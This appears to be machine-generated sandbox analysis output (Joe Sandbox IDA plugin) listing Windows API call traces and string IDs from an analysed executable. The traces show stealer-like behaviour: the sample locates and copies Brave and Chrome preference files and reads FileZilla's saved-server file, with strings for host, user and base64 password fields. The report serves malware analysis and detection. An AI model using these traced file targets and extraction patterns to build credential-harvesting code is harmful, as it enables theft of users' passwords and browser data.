                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DD70
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062DD7B
                          • lstrlen.KERNEL32(00651794), ref: 0062DD86
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DDA3
                          • lstrcat.KERNEL32(00000000,00651794), ref: 0062DDAF
                          • lstrlen.KERNEL32(?), ref: 0062DDBC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DDDF
                          • lstrcat.KERNEL32(00000000,?), ref: 0062DDED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DE19
                          • lstrlen.KERNEL32(00651794), ref: 0062DE3D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062DE6F
                          • lstrcat.KERNEL32(00000000,00651794), ref: 0062DE7B
                          • lstrlen.KERNEL32(01298870), ref: 0062DE8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DEB0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062DEBB
                          • lstrlen.KERNEL32(00651794), ref: 0062DEC6
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062DEE6
                          • lstrcat.KERNEL32(00000000,00651794), ref: 0062DEF2
                          • lstrlen.KERNEL32(01298BA0), ref: 0062DF01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DF27
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062DF32
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DF5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DFA5
                          • lstrcat.KERNEL32(00000000,00651794), ref: 0062DFB1
                          • lstrlen.KERNEL32(01298870), ref: 0062DFC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DFE9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062DFF4
                          • lstrlen.KERNEL32(00651794), ref: 0062DFFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E022
                          • lstrcat.KERNEL32(00000000,00651794), ref: 0062E02E
                          • lstrlen.KERNEL32(01298BA0), ref: 0062E03D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062E063
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062E06E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062E09A
                          • StrCmpCA.SHLWAPI(?,Brave), ref: 0062E0CD
                          • StrCmpCA.SHLWAPI(?,Preferences), ref: 0062E0E7
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062E11F
                          • lstrlen.KERNEL32(0129CEA8), ref: 0062E12E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E155
                          • lstrcat.KERNEL32(00000000,?), ref: 0062E15D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062E19F
                          • lstrcat.KERNEL32(00000000), ref: 0062E1A9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062E1D0
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0062E1F9
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062E22F
                          • lstrlen.KERNEL32(01298B40), ref: 0062E23D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E261
                          • lstrcat.KERNEL32(00000000,01298B40), ref: 0062E269
                          • lstrlen.KERNEL32(\Brave\Preferences), ref: 0062E274
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062E29B
                          • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 0062E2A7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062E2CF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E30F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062E349
                          • DeleteFileA.KERNEL32(?), ref: 0062E381
                          • StrCmpCA.SHLWAPI(?,0129CC50), ref: 0062E3AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E3F4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062E41C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E445
                          • StrCmpCA.SHLWAPI(?,01298BA0), ref: 0062E468
                          • StrCmpCA.SHLWAPI(?,01298870), ref: 0062E47D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062E4D9
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0062E4E0
                          • StrCmpCA.SHLWAPI(?,0129CC98), ref: 0062E58E
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062E5C4
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0062E639
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E678
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E6A1
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E6C7
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E70E
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E737
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E75C
                          • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0062E776
                          • DeleteFileA.KERNEL32(?), ref: 0062E7D2
                          • StrCmpCA.SHLWAPI(?,01298B50), ref: 0062E7FC
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E88C
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E8B5
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E8EE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062E916
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062E952
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 2635522530-726946144
                          • Opcode ID: 4a150f22e0a972388692e10b18dc763ac04d98a7ec14e823eb82406d01d02c50
                          • Instruction ID: 26b8a55f206452b2b414d31e963baf18fc504cd2509245a6d05d0ad03f991f0f
                          • Opcode Fuzzy Hash: 4a150f22e0a972388692e10b18dc763ac04d98a7ec14e823eb82406d01d02c50
                          • Instruction Fuzzy Hash: 16927F71910B26ABCB60EF65EC89AEE77BABF44301F044528F849A7351DB38DD458F90
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006318D2
                          • lstrlen.KERNEL32(\*.*), ref: 006318DD
                          • lstrcpy.KERNEL32(00000000,?), ref: 006318FF
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 0063190B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631932
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00631947
                          • StrCmpCA.SHLWAPI(?,006517A0), ref: 00631967
                          • StrCmpCA.SHLWAPI(?,006517A4), ref: 00631981
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006319BF
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006319F2
                          • lstrcpy.KERNEL32(00000000,?), ref: 00631A1A
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00631A25
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631A4C
                          • lstrlen.KERNEL32(00651794), ref: 00631A5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631A80
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00631A8C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631AB4
                          • lstrlen.KERNEL32(?), ref: 00631AC8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631AE5
                          • lstrcat.KERNEL32(00000000,?), ref: 00631AF3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631B19
                          • lstrlen.KERNEL32(01298A20), ref: 00631B2F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631B59
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00631B64
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631B8F
                          • lstrlen.KERNEL32(00651794), ref: 00631BA1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631BC3
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00631BCF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631BF8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631C25
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00631C30
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631C57
                          • lstrlen.KERNEL32(00651794), ref: 00631C69
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631C8B
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00631C97
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631CC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631CEF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00631CFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631D21
                          • lstrlen.KERNEL32(00651794), ref: 00631D33
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631D55
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00631D61
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631D8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631DB9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00631DC4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631DED
                          • lstrlen.KERNEL32(00651794), ref: 00631E19
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631E36
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00631E42
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631E68
                          • lstrlen.KERNEL32(0129CE48), ref: 00631E7E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631EB2
                          • lstrlen.KERNEL32(00651794), ref: 00631EC6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631EE3
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00631EEF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631F15
                          • lstrlen.KERNEL32(0129D2E8), ref: 00631F2B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631F5F
                          • lstrlen.KERNEL32(00651794), ref: 00631F73
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631F90
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00631F9C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00631FC2
                          • lstrlen.KERNEL32(0128AED8), ref: 00631FD8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00632000
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0063200B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00632036
                          • lstrlen.KERNEL32(00651794), ref: 00632048
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00632067
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00632073
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00632098
                          • lstrlen.KERNEL32(?), ref: 006320AC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006320D0
                          • lstrcat.KERNEL32(00000000,?), ref: 006320DE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00632103
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0063213F
                          • lstrlen.KERNEL32(0129CEA8), ref: 0063214E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00632176
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00632181
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                          • String ID: \*.*
                          • API String ID: 712834838-1173974218
                          • Opcode ID: f8abe16055fb32f4bd04f1c1eb951708672da2f59c7387fcb9167034f338f3c8
                          • Instruction ID: b06bfaf027a6f539c8a3845eeb8eff76486979e0d54726871dbf122fc3d4fa40
                          • Opcode Fuzzy Hash: f8abe16055fb32f4bd04f1c1eb951708672da2f59c7387fcb9167034f338f3c8
                          • Instruction Fuzzy Hash: 04628D70911A27ABCB21AF65DC59AEEB7BBBF45701F040128F805AB351DB38DD45CBA0
                          APIs
                          • wsprintfA.USER32 ref: 0063392C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00633943
                          • StrCmpCA.SHLWAPI(?,006517A0), ref: 0063396C
                          • StrCmpCA.SHLWAPI(?,006517A4), ref: 00633986
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 006339BF
                          • lstrcpy.KERNEL32(00000000,?), ref: 006339E7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 006339F2
                          • lstrlen.KERNEL32(00651794), ref: 006339FD
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633A1A
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00633A26
                          • lstrlen.KERNEL32(?), ref: 00633A33
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633A53
                          • lstrcat.KERNEL32(00000000,?), ref: 00633A61
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633A8A
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00633ACE
                          • lstrlen.KERNEL32(?), ref: 00633AD8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633B05
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00633B10
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633B36
                          • lstrlen.KERNEL32(00651794), ref: 00633B48
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633B6A
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00633B76
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633B9E
                          • lstrlen.KERNEL32(?), ref: 00633BB2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633BD2
                          • lstrcat.KERNEL32(00000000,?), ref: 00633BE0
                          • lstrlen.KERNEL32(01298B40), ref: 00633C0B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633C31
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00633C3C
                          • lstrlen.KERNEL32(01298A20), ref: 00633C5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633C84
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00633C8F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633CB7
                          • lstrlen.KERNEL32(00651794), ref: 00633CC9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633CE8
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00633CF4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633D1A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00633D47
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00633D52
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633D79
                          • lstrlen.KERNEL32(00651794), ref: 00633D8B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633DAD
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00633DB9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633DE2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633E11
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00633E1C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633E43
                          • lstrlen.KERNEL32(00651794), ref: 00633E55
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633E77
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00633E83
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633EAC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633EDB
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00633EE6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633F0D
                          • lstrlen.KERNEL32(00651794), ref: 00633F1F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633F41
                          • lstrcat.KERNEL32(00000000,00651794), ref: 00633F4D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633F75
                          • lstrlen.KERNEL32(?), ref: 00633F89
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633FA9
                          • lstrcat.KERNEL32(00000000,?), ref: 00633FB7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00633FE0
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0063401F
                          • lstrlen.KERNEL32(0129CEA8), ref: 0063402E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00634056
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00634061
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063408A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006340CE
                          • lstrcat.KERNEL32(00000000), ref: 006340DB
                          • FindNextFileA.KERNEL32(00000000,?), ref: 006342D9
                          • FindClose.KERNEL32(00000000), ref: 006342E8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 1006159827-1013718255
                          • Opcode ID: 81e3e2b654c8069f89391b83fb92c9046d898c2dc3f815939a88fa8ee0c03351
                          • Instruction ID: 7abe198488f3eb7089658c8adc45a9d3320f24630c459d0170aa4eecaff91b94
                          • Opcode Fuzzy Hash: 81e3e2b654c8069f89391b83fb92c9046d898c2dc3f815939a88fa8ee0c03351
                          • Instruction Fuzzy Hash: 03628E71D11A26ABCB21AF65DC49AEEB7BBBF44301F044128F845A7750DB38EE45CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00636995
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 006369C8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636A02
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636A29
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00636A34
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636A5D
                          • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00636A77
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636A99
                          • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00636AA5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636AD0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00636B00
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00636B35
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00636B9D
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 00636BCD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 313953988-555421843
                          • Opcode ID: cf96e222f53a8878dc3a310bf2f6676a50ec69bbc332cac5a70e7bcc236136b2
                          • Instruction ID: 6a81a69b23bdc471b5cb5666726f4414205e3562671b20c7ae5b5fa68ea85e1a
                          • Opcode Fuzzy Hash: cf96e222f53a8878dc3a310bf2f6676a50ec69bbc332cac5a70e7bcc236136b2
                          • Instruction Fuzzy Hash: 8E42A170A01716BBCB61ABB1DC59AAEB7BBBF04701F049518F846E7351DB38D905CBA0
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062DBC1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DBE4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062DBEF
                          • lstrlen.KERNEL32(00654CA8), ref: 0062DBFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DC17
                          • lstrcat.KERNEL32(00000000,00654CA8), ref: 0062DC23
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DC4C
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062DC8F
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062DCBF
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0062DCD0
                          • StrCmpCA.SHLWAPI(?,006517A0), ref: 0062DCF0
                          • StrCmpCA.SHLWAPI(?,006517A4), ref: 0062DD0A
                          • lstrlen.KERNEL32(0064CFEC), ref: 0062DD1D
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0062DD47
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DD70
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062DD7B
                          • lstrlen.KERNEL32(00651794), ref: 0062DD86
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DDA3
                          • lstrcat.KERNEL32(00000000,00651794), ref: 0062DDAF
                          • lstrlen.KERNEL32(?), ref: 0062DDBC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DDDF
                          • lstrcat.KERNEL32(00000000,?), ref: 0062DDED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DE19
                          • lstrlen.KERNEL32(00651794), ref: 0062DE3D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062DE6F
                          • lstrcat.KERNEL32(00000000,00651794), ref: 0062DE7B
                          • lstrlen.KERNEL32(01298870), ref: 0062DE8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DEB0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062DEBB
                          • lstrlen.KERNEL32(00651794), ref: 0062DEC6
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062DEE6
                          • lstrcat.KERNEL32(00000000,00651794), ref: 0062DEF2
                          • lstrlen.KERNEL32(01298BA0), ref: 0062DF01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DF27
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062DF32
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DF5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DFA5
                          • lstrcat.KERNEL32(00000000,00651794), ref: 0062DFB1
                          • lstrlen.KERNEL32(01298870), ref: 0062DFC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0062DFE9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0062DFF4
